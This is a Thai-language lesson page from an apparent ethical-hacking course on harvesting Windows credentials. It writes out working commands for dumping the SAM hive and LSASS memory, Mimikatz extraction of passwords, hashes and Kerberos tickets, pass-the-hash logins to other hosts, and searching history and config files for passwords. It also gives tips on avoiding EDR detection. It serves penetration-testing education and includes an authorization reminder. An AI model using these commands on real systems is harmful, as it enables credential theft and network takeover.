Ethical Hacking Academy · บทเรียน

การเก็บเกี่ยวข้อมูลรับรอง

ดัมพ์ข้อมูลลับ

บทเรียน 4 จาก 413 ขั้นตอน

การเก็บเกี่ยวข้อมูลรับรอง เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

เหตุใดจึงต้องเก็บเกี่ยวข้อมูลประจำตัว

แม้จะได้สิทธิ์ SYSTEM แล้ว รางวัลที่แท้จริงมักเป็น ข้อมูลประจำตัว เช่น แฮชรหัสผ่าน รหัสผ่านแบบข้อความธรรมดา และตั๋วที่ช่วยให้เคลื่อนที่ไปยังเครื่องอื่นและเข้าถึงโดเมนได้ การเก็บเกี่ยวข้อมูลประจำตัว เปลี่ยนการยึดครองเครื่องหนึ่งเครื่องให้กลายเป็นการยึดครองทั้งเครือข่าย

ฐานข้อมูล SAM

แฮชของบัญชีภายในเครื่องอยู่ในกลุ่มรีจิสทรี SAM และเข้ารหัสด้วยคีย์ในกลุ่ม SYSTEM เมื่อมีสิทธิ์ SYSTEM คุณสามารถดัมป์ทั้งสองส่วนแล้วสกัดแฮช NTLM แบบออฟไลน์ได้

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCAL

หน่วยความจำของ LSASS

กระบวนการ LSASS เก็บข้อมูลประจำตัวของผู้ใช้ที่เข้าสู่ระบบไว้ในหน่วยความจำ ซึ่งมักรวมถึงรหัสผ่านแบบข้อความธรรมดา แฮช NTLM ที่นำกลับมาใช้ได้ และตั๋ว Kerberos การดัมป์ LSASS จึงเป็นการเก็บเกี่ยวข้อมูลที่มีมูลค่าสูงสุด

rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp full

Mimikatz

Mimikatz เป็นเครื่องมือสกัดข้อมูลประจำตัวที่มีชื่อเสียง คำสั่ง sekurlsa::logonpasswords ดึงข้อมูลประจำตัวจาก LSASS นอกจากนี้ยังสามารถสกัดตั๋ว ทำการส่งต่อแฮช และดัมป์ SAM ได้ด้วย

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

การส่งต่อแฮช

โดยมากคุณไม่จำเป็นต้องถอดรหัสแฮช เพราะ การส่งต่อแฮช สามารถยืนยันตัวตนโดยใช้แฮช NTLM โดยตรง นี่คือเหตุผลที่การดัมป์แฮชก็เพียงพอสำหรับการเคลื่อนที่ไปยังเครื่องอื่นที่ใช้ข้อมูลประจำตัวผู้ดูแลระบบภายในเครื่องร่วมกัน

pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>

ข้อมูลประจำตัวโดเมนที่แคชไว้

เครื่องที่เข้าร่วมโดเมนจะแคชการเข้าสู่ระบบครั้งล่าสุด (MSCache/DCC2) เพื่อให้ผู้ใช้เข้าสู่ระบบแบบออฟไลน์ได้ แฮชที่แคชไว้นี้สามารถดัมป์และถอดรหัสแบบออฟไลน์ได้ แม้จะใช้เวลานาน และอาจทำให้ได้รหัสผ่านโดเมน

secretsdump.py -system system.save -security security.save LOCAL

ข้อมูลประจำตัวที่บันทึกและจัดเก็บไว้

Windows จัดเก็บข้อมูลประจำตัวไว้ใน Credential Manager / Vault และในข้อมูลที่ได้รับการป้องกันด้วย DPAPI (เช่น RDP ที่บันทึกไว้ รหัสผ่านเบราว์เซอร์ และ Wi-Fi) เมื่อมี SYSTEM และคีย์หลัก คุณสามารถถอดรหัสข้อมูลเหล่านี้ได้

cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>

การขโมยตั๋ว Kerberos

ใน Active Directory คำสั่ง sekurlsa::tickets ของ Mimikatz จะส่งออก TGT/TGS ของ Kerberos ตั๋วที่ขโมยมาช่วยให้ทำ การส่งต่อตั๋ว ได้ และ TGT ของผู้ดูแลโดเมนอาจนำไปสู่การคงอยู่ด้วย Golden/Silver Ticket

sekurlsa::tickets /export

ไฟล์และสคริปต์ที่มีข้อมูลลับ

อย่ามองข้ามสิ่งที่หาได้ง่าย เช่น สคริปต์ ไฟล์การกำหนดค่า และประวัติที่เต็มไปด้วยข้อมูลประจำตัวแบบข้อความธรรมดา ประวัติ PowerShell ไฟล์การติดตั้งแบบไม่ต้องดูแล และสตริงการเชื่อมต่อใน IIS web.config มักมีรหัสผ่านอยู่

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.config

การล้างร่องรอยและ OPSEC

การดัมป์ LSASS ถูกเฝ้าระวังอย่างเข้มงวดโดย EDR และ Defender Credential Guard อาจบล็อกการดำเนินการนี้ ในการปฏิบัติงานควรเลือกวิธีที่แฝงตัวได้ดี ล้างไฟล์ดัมป์ และบันทึกสิ่งที่เข้าถึงไว้ในรายงาน

จริยธรรมและการได้รับอนุญาต

การเก็บเกี่ยวข้อมูลประจำตัวเปิดเผยข้อมูลลับที่ละเอียดอ่อนที่สุดขององค์กร ควรจัดการข้อมูลประจำตัวที่ดัมป์มาอย่างปลอดภัย ห้ามนำข้อมูลออกนอกขอบเขตงาน และปฏิบัติงานภายใต้การอนุญาตเป็นลายลักษณ์อักษรอย่างชัดเจนเท่านั้น

ตรวจสอบความเข้าใจอย่างรวดเร็ว

ทดสอบความรู้เกี่ยวกับการเก็บเกี่ยวข้อมูลประจำตัว

สรุปทบทวน

คุณได้เรียนรู้เรื่องการเก็บเกี่ยวข้อมูลประจำตัว:

  • ดัมป์ SAM เพื่อรับแฮชภายในเครื่อง และดัมป์ LSASS เพื่อรับข้อมูลของผู้ใช้ที่เข้าสู่ระบบและตั๋วต่าง ๆ
  • Mimikatz สกัดรหัสผ่าน แฮช และตั๋ว Kerberos ได้
  • การส่งต่อแฮช / การส่งต่อตั๋ว ช่วยให้เคลื่อนที่ไปยังเครื่องอื่นได้โดยไม่ต้องถอดรหัส
  • ตรวจสอบ Credential Manager, DPAPI และไฟล์การกำหนดค่า/ประวัติเพื่อค้นหาข้อมูลลับ

หลักสูตรการเพิ่มสิทธิ์บน Windows จบลงเพียงเท่านี้

เริ่มต้นได้ฟรี

เรียนรู้ Ethical Hacking Academy ด้วย AI tutor — ฟรี

เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป

คอร์ส
31
บทเรียน
111

คำถามที่พบบ่อย

บทเรียน “การเก็บเกี่ยวข้อมูลรับรอง” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “การเก็บเกี่ยวข้อมูลรับรอง” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “การเก็บเกี่ยวข้อมูลรับรอง”

ดัมพ์ข้อมูลลับ คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 4 จากทั้งหมด 4 บทเรียน

บทเรียน “การเก็บเกี่ยวข้อมูลรับรอง” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม

ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. การแจกแจงข้อมูลของ Windows
  2. การกำหนดค่าบริการผิดพลาด
  3. การปลอมตัวเป็นโทเค็น
  4. การเก็บเกี่ยวข้อมูลรับรอง
← กลับไปที่ Ethical Hacking Academy